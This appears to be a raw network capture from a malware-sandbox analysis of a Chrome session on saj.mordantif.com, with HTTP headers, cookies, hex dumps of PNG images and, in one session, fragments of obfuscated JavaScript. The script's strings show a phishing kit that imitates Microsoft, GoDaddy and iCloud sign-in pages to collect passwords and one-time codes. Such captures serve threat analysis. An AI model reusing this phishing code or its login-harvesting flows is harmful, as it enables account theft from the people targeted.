                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC668INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 1400
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYt65Eqm9T%2BKPJwAnxSJcu8H91Fyu5lxcPLDBFE5RjVBPZT%2BbodoOjeWk7qOXlu%2Fk2msxTV06k4ap2Sd%2B%2Bru1bcuxCMLIGKhbRtCFnFpMNeyxLj9wcstaOeIflPYUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcddedf1875-EWR
                                                        2024-09-13 13:07:09 UTC701INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                        Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                        2024-09-13 13:07:09 UTC699INData Raw: 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff
                                                        Data Ascii: Ite~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.549810104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1110OUTGET /347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC656INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vvTCxrA6Nx1ooZZ886xmDQvtECaWW6f86NPOeqFNPKAVAxn3jVUFQ50BnXmI%2FLEoxsTUv7r8H7Dz2jr7LNSLHsE4qOt3QTUTOMmqTG%2FO8jg5ARoDNSewUkrgMTdx9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcddcc01927-EWR
                                                        2024-09-13 13:07:09 UTC713INData Raw: 33 37 38 33 0d 0a 63 6f 6e 73 74 20 5f 30 78 36 61 34 37 39 35 3d 5f 30 78 35 32 31 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 63 64 36 65 2c 5f 30 78 34 34 62 33 66 31 29 7b 63 6f 6e 73 74 20 5f 30 78 31 37 35 66 35 30 3d 5f 30 78 35 32 31 65 2c 5f 30 78 33 65 31 39 64 36 3d 5f 30 78 33 33 63 64 36 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 38 33 61 31 35 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 37 35 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 63 64 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 32 33 33 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 31 66
                                                        Data Ascii: 3783const _0x6a4795=_0x521e;(function(_0x33cd6e,_0x44b3f1){const _0x175f50=_0x521e,_0x3e19d6=_0x33cd6e();while(!![]){try{const _0x183a15=parseInt(_0x175f50(0x75))/0x1+parseInt(_0x175f50(0xcd))/0x2+parseInt(_0x175f50(0x233))/0x3*(-parseInt(_0x175f50(0x1f
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 73 69 74 65 64 61 6c 72 65 61 64 79 3d 6e 75 6c 6c 3b 6c 65 74 20 76 69 65 77 74 79 70 65 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 31 39 65 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 64 61 38 36 35 3d 5b 27 77 61 69 74 69 6e 67 5c 78 32 30 66 6f 72 5c 78 32 30 70 72 65 76 69 6f 75 73 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 63 6f 6d 70 6c 65 74 65 27 2c 27 70 68 6f 6e 65 5c 78 32 30 6f 74 70 27 2c 27 31 31 32 35 30 34 57 52 72 67 62 41 27 2c 27 73 65 63 74 69 6f 6e 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 27 2c 27 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 73 27 2c 27 69 6d 67 27 2c 27 74 65 78 74 2d 6c 65 66 74 27 2c 27 62 6f 64 79 27 2c 27 65
                                                        Data Ascii: sitedalready=null;let viewtype=null;function _0x419e(){const _0x3da865=['waiting\x20for\x20previous\x20request\x20to\x20complete','phone\x20otp','112504WRrgbA','section_multipleaccounts','linkoptionclick(this)','protectoptions','img','text-left','body','e
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 6c 4f 54 50 5f 4c 69 76 65 5f 32 27 2c 27 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 3e 56 69 65 77 5c 78 32 30 64 65 74 61 69 6c 73 3c 2f 61 3e 27 2c 27 73 65 63 74 69 6f 6e 5f 6f 74 70 27 2c 27 6d 6f 72 65 5c 78 32 30 69 6e 66 6f 5c 78 32 30 72 65 71 75 69 72 65 64 27 2c 27 69 63 6c 6f 75 64 2e 27 2c 27 73 75 63 63 65 73 73 27 2c 27 74 61 62 6c 65 2d 72 6f 77 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 2c 27 6d 65 74 68 6f 64 69 64 27 2c 27 53 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 75 73 69 6e 67 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 4d 69 63 72
                                                        Data Ascii: lOTP_Live_2','</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x20href=\x22#\x22>View\x20details</a>','section_otp','more\x20info\x20required','icloud.','success','table-row','backgroundImage','methodid','Sign\x20in\x20using\x20another\x20Micr
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 30 63 6f 64 65 5c 78 32 32 5c 78 32 30 74 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 27 2c 27 61 6e 69 6d 61 74 69 6f 6e 27 2c 27 69 6e 6e 65 72 54 65 78 74 27 2c 27 70 77 64 5f 67 6f 64 61 64 64 79 27 2c 27 73 65 73 73 69 6f 6e 5c 78 32 30 74 69 6d 65 6f 75 74 27 2c 27 65 72 72 6f 72 5f 76 65 72 69 66 79 65 6d 61 69 6c 27 2c 27 2e 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 72 61 64 69 6f 5c 78 32 32 5d 27 2c 27 63 61 6c 6c 27 2c 27 54 68 61 74 5c 78 32 30 64 6f 65 73 6e 5c 78 32 37 74 5c 78 32 30 6d 61 74 63 68 5c 78 32 30 74 68 65 5c 78 32 30 61 6c 74 65 72 6e 61 74 65 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 61 73 73 6f 63 69 61 74 65 64
                                                        Data Ascii: 0code\x22\x20to\x20receive\x20your\x20code.','animation','innerText','pwd_godaddy','session\x20timeout','error_verifyemail','.iAdditionalProofInfo\x20input[type=\x22radio\x22]','call','That\x20doesn\x27t\x20match\x20the\x20alternate\x20email\x20associated
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 61 6c 65 72 74 5c 78 32 30 61 6c 65 72 74 2d 65 72 72 6f 72 5c 78 32 30 48 69 64 65 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 50 61 72 74 69 61 6c 5c 78 32 30 64 69 72 6c 74 72 5c 78 32 30 69 6e 70 75 74 2d 67 72 6f 75 70 5c 78 32 30 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 5c 78
                                                        Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22alert\x20alert-error\x20Hide\x22\x20id=\x22iProofInputError\x22></div>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22emailPartial\x20dirltr\x20input-group\x20input-max-width\x
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 6f 6c 5c 78 32 30 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 5c 78 32 32 5c 78 32 30 6d 61 78 6c 65 6e 67 74 68 3d 5c 78 32 32 34 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 78 32 32 4c 61 73 74 5c 78 32 30 34 5c 78 32 30 64 69 67 69 74 73 5c 78 32 30 6f 66 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 27 6b 65 79 27 2c 27 72
                                                        Data Ascii: ol\x20input-max-width\x22\x20maxlength=\x224\x22\x20aria-required=\x22true\x22\x20aria-label=\x22Last\x204\x20digits\x20of\x20phone\x20number\x22\x20aria-describedby=\x22iProofInputError\x22>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20','key','r
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 27 2c 27 50 68 6f 6e 65 41 70 70 4f 54 50 27 2c 27 6e 75 6c 6c 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 27 2c 27 23 62 74 6e 5f 76 65 72 69 66 79 6f 74 70 5f 6c 69 76 65 27 2c 27 2e 61 75 74 68 2d 6f 72 67 2d 6c 6f 67 6f 27 2c 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 27 2c 27 61 72 69 61 2d 6c 69 76 65 27 2c 27 45 72 72 6f 72 3a 27 2c 27 68 69 64 65 2d 74 6f 2d 6c 65 66 74 5c 78 32 30 27 2c 27 52 65 63 65 69 76 65 64 5c 78 32 30 72 65 73 70 6f 6e 73 65 3a 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 69 6d 61 67 65 27 2c 27 32 34 70 78 27 2c 27 34 71 4f 54 5a 43 69 27 2c 27 23 62 74 6e 5f 6e 65 78 74 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63
                                                        Data Ascii: ctions_godaddy','PhoneAppOTP','null','background-image','#btn_verifyotp_live','.auth-org-logo','appendChild','iAdditionalProofInfo','aria-live','Error:','hide-to-left\x20','Received\x20response:','backgroundimage','24px','4qOTZCi','#btn_next','multipleacc
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 32 30 77 72 6f 6e 67 5c 78 32 30 63 6f 64 65 5c 78 32 30 77 61 73 5c 78 32 30 65 6e 74 65 72 65 64 2e 5c 78 32 30 53 65 6e 64 5c 78 32 30 79 6f 75 72 73 65 6c 66 5c 78 32 30 61 5c 78 32 30 6e 65 77 5c 78 32 30 63 6f 64 65 5c 78 32 30 61 6e 64 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 73 70 6c 61 79 27 2c 27 23 74 72 79 61 67 61 69 6e 5f 77 69 74 68 6f 75 74 69 6e 74 65 72 6e 65 74 27 2c 27 62 74 6e 5f 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 27 2c 27 63 68 65 63 6b 61 70 70 68 61 76 69 6e 67 74 72 6f 75 62 6c 65 73 65 63 74 69 6f 6e 27 2c 27 73 65 63 74 69 6f 6e 5f 73 69 64 65 62 61 72 6c 6f 67 69 6e 5f 61 64 66 73 27 2c 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 2c 27 72 65 6d 6f 76 65 27 2c 27 61 5f 74 65 78 74 27 2c 27 74 72 79 5f
                                                        Data Ascii: 20wrong\x20code\x20was\x20entered.\x20Send\x20yourself\x20a\x20new\x20code\x20and\x20try\x20again.','display','#tryagain_withoutinternet','btn_protectaccount','checkapphavingtroublesection','section_sidebarlogin_adfs','textContent','remove','a_text','try_
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 3e 4c 61 73 74 5c 78 32 30 34 5c 78 32 30 64 69 67 69 74 73 5c 78 32 30 6f 66 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 3c 2f 6c 61 62 65 6c 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 74 65 6c 5c 78 32 32 5c 78 32 30 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 5c 78 32 32 6f 66 66 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68
                                                        Data Ascii: =\x22true\x22>Last\x204\x20digits\x20of\x20phone\x20number</label>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<input\x20type=\x22tel\x22\x20autocomplete=\x22off\x22\x20id=\x22iProofPhone\x22\x20name=\x22iProofPhone\x22\x20class=\x22form-control\x20input-max-width
                                                        2024-09-13 13:07:09 UTC1369INData Raw: 6f 66 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 27 2c 27 65 72 72 6f 72 5f 70 77 64 27 2c 27 61 70 70 72 6f 76 65 5c 78 32 30 61 75 74 68 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 61 75 74 68 5c 78 32 30 61 70 70 27 2c 27 70 77 64 27 2c 27 72 65 70 6c 61 63 65 27 2c 27 63 61 6c 6c 6f 74 70 27 2c 27 6f 74 70 6c 69 76 65 69 6d 67 27 2c 27 56 65 72 69 66 79 5c 78 32 30 6f 6e 6c 69 6e 65 27 2c 27 74 77 6f 66 61 73 65 6c 65 63 74 27 2c 27 65 72 72 6f 72 5f 61 75 74 68 63 61 6c 6c 27 2c 27 74 65 78 74 27 2c 27 5c 78 32 32 5c 78 32 30 6f 6e 63 6c 69 63 6b 3d 5c 78 32 32 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 5c 78 32 32 3e 27 2c 27 4f 6e 65 57 61 79 56 6f 69 63 65 4d 6f 62 69 6c 65 4f 54 50 27 2c 27 74 61 62 6c 65 27 2c
                                                        Data Ascii: of\x20phone\x20number','error_pwd','approve\x20auth\x20request\x20auth\x20app','pwd','replace','callotp','otpliveimg','Verify\x20online','twofaselect','error_authcall','text','\x22\x20onclick=\x22linkoptionclick(this)\x22>','OneWayVoiceMobileOTP','table',


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.549815172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1447OUTGET /uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC642INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 231
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6DIp0osgCgCLUw85ty4XCYzF2i0MTCCM%2BdgB30p9wTLi9izZwaihqOhr%2F49cOeu1QLQe3swUNXHvsNZSsEkzRQT0SN%2BYeIti2TaEUOfAWsY42HzgJnsUIriTc3jRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcf59b4430d-EWR
                                                        2024-09-13 13:07:09 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.549814172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1448OUTGET /qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
